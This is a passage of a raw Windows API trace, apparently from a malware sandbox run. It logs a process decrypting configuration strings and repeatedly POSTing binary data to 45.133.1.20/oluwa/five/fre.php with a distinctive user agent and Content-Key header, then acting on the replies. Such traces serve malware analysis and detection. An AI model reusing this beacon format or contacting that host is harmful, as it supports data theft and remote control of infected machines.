Flags=0x0, Size=0x1fdc) returned 0x6def40 [0285.053] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.056] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.056] GetProcessHeap () returned 0x6a0000 [0285.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0285.057] GetProcessHeap () returned 0x6a0000 [0285.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0285.057] send (s=0xa70, buf=0x6bd460*, len=242, flags=0) returned 242 [0285.058] send (s=0xa70, buf=0x6bb998*, len=159, flags=0) returned 159 [0285.058] GetProcessHeap () returned 0x6a0000 [0285.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0285.058] recv (in: s=0xa70, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0285.135] GetProcessHeap () returned 0x6a0000 [0285.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0285.136] GetProcessHeap () returned 0x6a0000 [0285.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0285.137] GetProcessHeap () returned 0x6a0000 [0285.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0285.139] GetProcessHeap () returned 0x6a0000 [0285.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0285.139] closesocket (s=0xa70) returned 0 [0285.140] GetProcessHeap () returned 0x6a0000 [0285.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0285.140] GetProcessHeap () returned 0x6a0000 [0285.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.141] GetProcessHeap () returned 0x6a0000 [0285.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0285.141] GetProcessHeap () returned 0x6a0000 [0285.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0285.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x664) returned 0xa70 [0285.146] Sleep (dwMilliseconds=0xea60) [0285.147] GetProcessHeap () returned 0x6a0000 [0285.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0285.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.149] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.156] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0285.168] GetProcessHeap () returned 0x6a0000 [0285.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0285.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.170] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0285.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.171] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.172] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.172] GetProcessHeap () returned 0x6a0000 [0285.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0285.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.174] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0285.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.175] CryptDestroyKey (hKey=0x6ad020) returned 1 [0285.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.226] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0285.227] GetProcessHeap () returned 0x6a0000 [0285.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.229] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.230] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.231] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.231] GetProcessHeap () returned 0x6a0000 [0285.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0285.232] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.232] GetProcessHeap () returned 0x6a0000 [0285.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0285.232] GetProcessHeap () returned 0x6a0000 [0285.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.233] GetProcessHeap () returned 0x6a0000 [0285.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0285.234] GetProcessHeap () returned 0x6a0000 [0285.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0285.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.238] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.264] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0285.271] GetProcessHeap () returned 0x6a0000 [0285.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0285.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.272] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0285.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.273] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.274] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.274] GetProcessHeap () returned 0x6a0000 [0285.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0285.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.276] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0285.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.279] CryptDestroyKey (hKey=0x6ad520) returned 1 [0285.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.283] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0285.283] GetProcessHeap () returned 0x6a0000 [0285.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.285] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0285.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.286] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0285.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.300] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0285.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.301] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0285.301] GetProcessHeap () returned 0x6a0000 [0285.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0285.301] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0285.301] GetProcessHeap () returned 0x6a0000 [0285.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0285.301] socket (af=2, type=1, protocol=6) returned 0xa74 [0285.302] connect (s=0xa74, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0285.327] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0285.327] GetProcessHeap () returned 0x6a0000 [0285.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0285.327] GetProcessHeap () returned 0x6a0000 [0285.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0285.328] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.330] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.330] GetProcessHeap () returned 0x6a0000 [0285.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0285.330] GetProcessHeap () returned 0x6a0000 [0285.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0285.330] GetProcessHeap () returned 0x6a0000 [0285.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0285.331] GetProcessHeap () returned 0x6a0000 [0285.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0285.332] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.333] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.333] GetProcessHeap () returned 0x6a0000 [0285.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0285.333] GetProcessHeap () returned 0x6a0000 [0285.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0285.334] send (s=0xa74, buf=0x6bd460*, len=242, flags=0) returned 242 [0285.335] send (s=0xa74, buf=0x6bb998*, len=159, flags=0) returned 159 [0285.335] GetProcessHeap () returned 0x6a0000 [0285.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0285.335] recv (in: s=0xa74, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0285.410] GetProcessHeap () returned 0x6a0000 [0285.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0285.411] GetProcessHeap () returned 0x6a0000 [0285.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0285.411] GetProcessHeap () returned 0x6a0000 [0285.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0285.411] GetProcessHeap () returned 0x6a0000 [0285.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0285.412] closesocket (s=0xa74) returned 0 [0285.413] GetProcessHeap () returned 0x6a0000 [0285.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0285.413] GetProcessHeap () returned 0x6a0000 [0285.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.416] GetProcessHeap () returned 0x6a0000 [0285.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0285.416] GetProcessHeap () returned 0x6a0000 [0285.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0285.417] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5e0) returned 0xa74 [0285.419] Sleep (dwMilliseconds=0xea60) [0285.421] GetProcessHeap () returned 0x6a0000 [0285.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0285.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0285.444] GetProcessHeap () returned 0x6a0000 [0285.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7e18 [0285.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.445] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c7e18, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0285.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.447] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.448] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.448] GetProcessHeap () returned 0x6a0000 [0285.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7e18 | out: hHeap=0x6a0000) returned 1 [0285.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.453] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0285.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.454] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0285.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.455] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0285.455] GetProcessHeap () returned 0x6a0000 [0285.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.461] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.462] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.464] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.465] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.465] GetProcessHeap () returned 0x6a0000 [0285.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0285.465] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.465] GetProcessHeap () returned 0x6a0000 [0285.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0285.466] GetProcessHeap () returned 0x6a0000 [0285.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0285.466] GetProcessHeap () returned 0x6a0000 [0285.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0285.467] GetProcessHeap () returned 0x6a0000 [0285.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0285.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0285.503] GetProcessHeap () returned 0x6a0000 [0285.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0285.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.508] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0285.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.510] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.511] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.511] GetProcessHeap () returned 0x6a0000 [0285.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0285.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.513] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0285.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.514] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0285.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0285.519] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0285.519] GetProcessHeap () returned 0x6a0000 [0285.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0285.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.521] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0285.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.522] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0285.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.523] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0285.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.525] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0285.525] GetProcessHeap () returned 0x6a0000 [0285.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0285.525] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0285.525] GetProcessHeap () returned 0x6a0000 [0285.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0285.525] socket (af=2, type=1, protocol=6) returned 0xa78 [0285.526] connect (s=0xa78, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0285.557] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0285.557] GetProcessHeap () returned 0x6a0000 [0285.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0285.557] GetProcessHeap () returned 0x6a0000 [0285.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0285.558] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.559] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.559] GetProcessHeap () returned 0x6a0000 [0285.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba6b0 [0285.559] GetProcessHeap () returned 0x6a0000 [0285.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0285.560] GetProcessHeap () returned 0x6a0000 [0285.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0285.560] GetProcessHeap () returned 0x6a0000 [0285.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0285.561] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0285.562] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.562] GetProcessHeap () returned 0x6a0000 [0285.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0285.562] GetProcessHeap () returned 0x6a0000 [0285.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0285.563] send (s=0xa78, buf=0x6bd460*, len=242, flags=0) returned 242 [0285.563] send 